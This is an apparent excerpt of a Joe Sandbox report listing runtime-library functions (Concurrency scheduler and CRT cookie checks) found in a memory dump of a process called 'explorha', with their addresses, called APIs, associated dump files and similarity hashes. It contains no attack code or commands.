                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                      • String ID:
                                                                                                      • API String ID: 1475861073-0
                                                                                                      • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                      • Instruction ID: c3c229ecc9c9e203ae715f38f8b228b40a5aa7f19975e8644c9f98637278df22
                                                                                                      • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                      • Instruction Fuzzy Hash: 85312730B04255ABCF16BA7C48927FEBBB6FF55344F080169E582E7242DF254D46C792
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00895ED0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00895F07
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00895F0F
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00895F98
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00895FC3
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00896018
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: f730a51fc9f99e788140a159127c1b9db633dd23b2f10b4a50647b66fb16fb0e
                                                                                                      • Instruction ID: b91301f76038887e74df762e99d0a9f340721ea219131c4d9cd7fd778d6db821
                                                                                                      • Opcode Fuzzy Hash: f730a51fc9f99e788140a159127c1b9db633dd23b2f10b4a50647b66fb16fb0e
                                                                                                      • Instruction Fuzzy Hash: 7741B030A00608EFCF11EF6CC885A9EBBB5FF45324F188155E819DB392DB319A45CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088F3A8 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0088F421
                                                                                                      • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0088F43E
                                                                                                      • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0088F4A4
                                                                                                      • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0088F4B9
                                                                                                      • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0088F4CB
                                                                                                      • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0088F4DB
                                                                                                      • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0088F504
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 2885714658-0
                                                                                                      • Opcode ID: 2001e0edc81896b002909e73c5d1f19f2a4d2712d7c1e0581db6fd53791d3ef3
                                                                                                      • Instruction ID: a1213067ff03fb635f0d6f71eb3363cb4686169860a4ed042ec30121c8fe2a96
                                                                                                      • Opcode Fuzzy Hash: 2001e0edc81896b002909e73c5d1f19f2a4d2712d7c1e0581db6fd53791d3ef3
                                                                                                      • Instruction Fuzzy Hash: ED419D20A002449ADF15FFB884557AD77A1FF45304F1840BAEA45EB2C7DB248A09CB67
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0088FE3F Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0088FE67
                                                                                                        • Part of subcall function 0088FBD4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0088FC07
                                                                                                        • Part of subcall function 0088FBD4: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0088FC29
                                                                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0088FEE4
                                                                                                      • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0088FEF0
                                                                                                      • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0088FEFF
                                                                                                      • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0088FF09
                                                                                                      • Concurrency::location::_Assign.LIBCMT ref: 0088FF3D
                                                                                                      • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0088FF45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038166109.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3039114047.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040343129.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040381021.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040509340.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040550421.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040600126.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040627686.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040654780.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040710491.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040736469.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040761508.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040785461.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040808759.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040832531.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040861141.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040884854.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040912755.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040938612.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040968862.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3040995111.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041022194.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041051151.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041080655.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041105496.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041134725.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041161637.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041194878.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041220294.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041272872.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041295271.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041318626.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041342143.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                      • String ID:
                                                                                                      • API String ID: 1924466884-0
                                                                                                      • Opcode ID: 2c343f99d94c0f2260b8b263544358e48983284ebac8dd8a13f1746a32edf971
                                                                                                      • Instruction ID: 8d8b63e64fd338923d5c644d0d3983878d4923dfd6fde461acd9256b2ccf8f41
                                                                                                      • Opcode Fuzzy Hash: 2c343f99d94c0f2260b8b263544358e48983284ebac8dd8a13f1746a32edf971
                                                                                                      • Instruction Fuzzy Hash: 70411C75A00204DFCF05EF68C495AADB7B5FF49310F1880AAEE59DB382DB34A941CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00885B6E Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ListArray.LIBCONCRT ref: 00885BC8
                                                                                                      • ListArray.LIBCONCRT ref: 00885BFC
                                                                                                      • Hash.LIBCMT ref: 00885C65
                                                                                                      • Hash.LIBCMT ref: 00885C75
                                                                                                        • Part of subcall function 0088B2D1: std::bad_exception::bad_exception.LIBCMT ref: 0088B2F3
                                                                                                      • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00885DDB
                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00885E34
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3037982747.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038017624.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3038130354.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
